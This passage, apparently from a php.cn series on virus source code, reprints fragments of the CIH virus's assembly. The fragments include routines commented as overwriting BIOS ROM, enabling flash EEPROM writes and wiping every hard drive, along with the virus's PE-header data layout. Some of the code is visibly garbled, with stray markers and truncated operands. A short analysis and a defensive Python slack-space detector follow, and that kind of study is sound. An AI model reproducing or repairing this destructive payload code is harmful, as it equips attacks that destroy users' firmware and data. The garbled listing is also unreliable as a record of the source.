Analysis of virus program source code examples: CIH virus [5]
push ecx
loop $
;Destroy the additional 000E0000 - 000E007F segment ROM data in the BIOS, a total of 80h bytes
xor ah, ah
mov [eax], al
xchg ecx, eax
loop $ # pop ecx
mov ch, 0aah
call ebx
mov byte ptr [eax], 20h
loop $
; Destroy the 000FE000 - 000FE07F segment data of the BIOS, 80h bytes in total
mov ah, 0e0h
mov [eax], al
[esi], 100ch
call esi
; Destroy all hard drives
KillHardDisk:
xor ebx, ebx
mov bh, FirstKillHardDiskNumber
push ebx
sub esp, 2CH
Push 0c0001000H
MOV BH, 08h
Push ebx
Push ECX
Push ECX ## Push Ecx ## Push 40000501h
Push Ecx
# push ecx
mov esi, esp
sub esp, 0ach
LoopOfKillHardDisk:
int 20h
dd 00100004h
cmp word ptr [esi+06h], 0017h
je KillNextDataSection
ChangeNextHardDisk:
inc byte ptr [esi+4dh]
jmp LoopOfKillHardDisk
;Destroy the next area
KillNextDataSection:
add dword ptr [esi+10h], ebx
mov byte ptr [esi+4dh], FirstKillHardDiskNumber
jmp LoopOfKillHardDisk
;Enable EEPROM write
EnableEEPROMToWrite:
mov [eax], cl
mov [ecx], al
mov byte ptr [eax], 80h
mov [eax], cl
mov [ecx], al
ret
IOForEEPROM:
@10 = IOForEEPROM
xchg eax, edi
xchg edx, ebp
out dx, eax
xchg eax, edi
xchg edx, ebp
in al, dx
BooleanCalculateCode = $
or al , 44h
ret BCSPath- IFSMgr_RemoveFileSystemApiHook
db IFSMgr_Ring0_FileIO-UniToBCSPath;The difference between the address of each Vxd call instruction
VxdCallIDTable dd 00010053h, 00400068h, 00400041h, 00400032h;The call number of Vxd
VxdCallTableSize = ($-VxdCallIDTable)/04h ;Number of Vxd calls used by the program
;Definition of virus version and copyright information
VirusVersionCopyright db 'CIH v';Identification of CIH virus
db MajorVirusVersion+'0';Main version number
db '.'
db MinorVirusVersion+'0' ;Minor version number
db ' TATUNG' ;Author name
;Virus size
VirusSize = $ + SizeOfVirusCodeSectionTableEndMark(04h)
+ NumberOfSections *SizeOfVirusCodeSectionTable(08h)
+ SizeOfTheFirstVirusCodeSectionTable(04h)
; Dynamic data definition
VirusGameDataStartAddress = VirusSize
@6 = VirusGameDataStartAddress ; Virus data starting address
OnBusy db 0; "Busy" flag
FileModificationTime dd ? ;File modification time
FileNameBufferSize dup(?) ;File name buffer
DataBuffer = $
@8 = DataBuffer
NumberOfSections dw ? ; Block number
TimeDateStamp dd ? ; File time
SymbolsPointer dd ?
NumberOfSymbols dd ? ; Number of symbols in the symbol table
SizeOfOptionalHeader dw ? ;The length of the optional header
_Characteristics dw ? ;Character set flag
Magic dw ? ;Flag word (always 010bh)
LinkerVersion dw ? ;Linker version number
SizeOfCode dd ? ; Code segment size
SizeOfInitializedData dd ? ;Initialized data block size
SizeOfUninitializedData dd ? ;Uninitialized data block size
AddressOfEntryPoint dd ? ;Program start RVA
BaseOfCode dd ? ; Code Section start RVA
BaseOfData dd ? ;Data section start RVA
ImageBase dd ? ;Load base address RVA
@9 = $
SectionAlignment dd ? ;Block alignment
FileAlignment dd ? ;File block alignment
OperatingSystemVersion dd ? ;Required operating system version number
ImageVersion dd ? ;User-defined version number
SubsystemVersion dd ? ;Required subsystem version number
Reserved dd ? ; Reserved
SizeOfImage dd ? ; Total length of each part of the file
SizeOfHeaders dd ? ; File header size
SizeOfImageHeaderToRead = $-NumberOfSections
NewAddressOfEntryPoint = DataBuffer
SizeOfImageHeaderToWrite = 04h
StartOfSectionTable = @9
SectionName = StartOfSectionTable ;Block name
VirtualSize = StartOfSectionTable+08h ;Section real length
VirtualAddress = StartOfSectionTable+0ch ;Block RVA
SizeOfRawData = StartOfSectionTable+10h ;Block physical length
PointerToRawData = StartOfSectionTable+14h ; Block physical offset
PointerToRelocations = StartOfSectionTable+18h ; Relocation offset
PointerToLineNumbers = StartOfSectionTable+1ch ; Line number table offset
NumberOfRelocations = StartOfSectionTable+20h ; Number of relocation items
NumberOfLinenNmbers = StartOfSectionTable+22h ; Number of line number tables
Characteristics = StartOfSectionTable+24h ; Block attributes
SizeOfScetionTable = Characteristics+04h-SectionName ; Length of each block table item
;Amount of memory required by the virus
VirusNeedBaseMemory = $
VirusTotalNeedMemory = @9
; + NumberOfSections(??)*SizeOfScetionTable(28h)
; + SizeOfVirusCodeSectionTableEndMark(04h)
; + NumberOfSections(??)*SizeOfVirusCodeSectionTable(08h)
From the above code analysis we can see that the CIH virus has a clear structure and distinct layers. The backbone of the virus program is very similar to that of a DOS virus, except that the details are handled the Win95 way and all system calls are made through Vxd services. This makes the virus program more low-level, more efficient, and easier to write. Compared with using Windows API functions, there is no need to handle the virus's own complex relocation; compared with using interrupts, it is better at resisting tracing and analysis of the program.
The CIH virus has two innovations. First, when it infects a file, it searches for the blank areas (slack space) between the sections of the target file and writes its own data structures and code into them; if the blank space is insufficient, the file is not infected, which is one reason some files are never infected. Second, when the virus triggers it can damage computer hardware, not only burning the Flash Memory but also destroying the hard disk.
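The slack-space infection described above can be checked for from the defender's side by reading the same header fields the data definitions in this listing name (NumberOfSections, SizeOfOptionalHeader, VirtualSize, SizeOfRawData, PointerToRawData). The following Python is an added example, not code from the page or from the virus: it parses a constructed toy PE image, reports each section's slack (SizeOfRawData minus VirtualSize) and whether that slack contains non-zero bytes, and looks for the 'CIH v' copyright tag; the sample image and the bytes placed in its slack are constructed here.

```python
import struct

# Field offsets follow the listing above: the COFF header sits at e_lfanew+4
# (NumberOfSections at +2, SizeOfOptionalHeader at +16), and each 0x28-byte
# section header holds VirtualSize (+08h), SizeOfRawData (+10h) and
# PointerToRawData (+14h).
def section_slack(pe):
    """Return (name, slack_bytes, slack_has_data) for every section."""
    e_lfanew = struct.unpack_from("<I", pe, 0x3C)[0]
    if pe[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("not a PE image")
    coff = e_lfanew + 4
    nsections = struct.unpack_from("<H", pe, coff + 2)[0]
    opt_size = struct.unpack_from("<H", pe, coff + 16)[0]
    table = coff + 20 + opt_size
    result = []
    for i in range(nsections):
        h = table + i * 0x28
        name = pe[h:h + 8].rstrip(b"\0").decode("ascii", "replace")
        vsize, _vaddr, rawsize, rawptr = struct.unpack_from("<IIII", pe, h + 8)
        slack = rawsize - vsize if rawsize > vsize else 0
        tail = pe[rawptr + vsize:rawptr + rawsize]   # bytes past the real content
        result.append((name, slack, any(tail)))       # non-zero slack is suspicious
    return result

def has_cih_marker(pe):
    """Cheap string check for the 'CIH v' copyright tag defined in the source."""
    return pe.find(b"CIH v") != -1

def build_sample(infected):
    """Constructed toy PE: DOS stub, two sections, optional bytes in .text slack."""
    e_lfanew, raw_text, raw_data = 0x40, 0x200, 0x400
    dos = b"MZ" + b"\0" * 0x3A + struct.pack("<I", e_lfanew)
    coff = struct.pack("<HHIIIHH", 0x14C, 2, 0, 0, 0, 0xE0, 0x102)
    opt = struct.pack("<H", 0x10B) + b"\0" * 0xDE                 # Magic 010bh
    def shdr(name, vsize, rawsize, rawptr):
        return name.ljust(8, b"\0") + struct.pack(
            "<IIIIIIHHI", vsize, 0x1000, rawsize, rawptr, 0, 0, 0, 0, 0x60000020)
    header = (dos + b"PE\0\0" + coff + opt
              + shdr(b".text", 0x150, 0x200, raw_text)
              + shdr(b".data", 0x200, 0x200, raw_data)).ljust(raw_text, b"\0")
    tail = b"CIH v1.2 TATUNG".ljust(0xB0, b"\xCC") if infected else b"\0" * 0xB0
    return header + b"\x90" * 0x150 + tail + b"A" * 0x200

if __name__ == "__main__":
    for flag in (False, True):
        img = build_sample(flag)
        print(flag, section_slack(img), has_cih_marker(img))
```

A clean build leaves the 0xB0 bytes of .text slack all zero; the constructed "infected" build shows the same slack size but with data in it, plus the marker string.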
For security reasons, we have not given a detailed analysis of this part of the code that causes viruses to attack and damage hardware.
The above is the virus program source code example analysis of the CIH virus [5], from the PHP Chinese website (www.php.cn).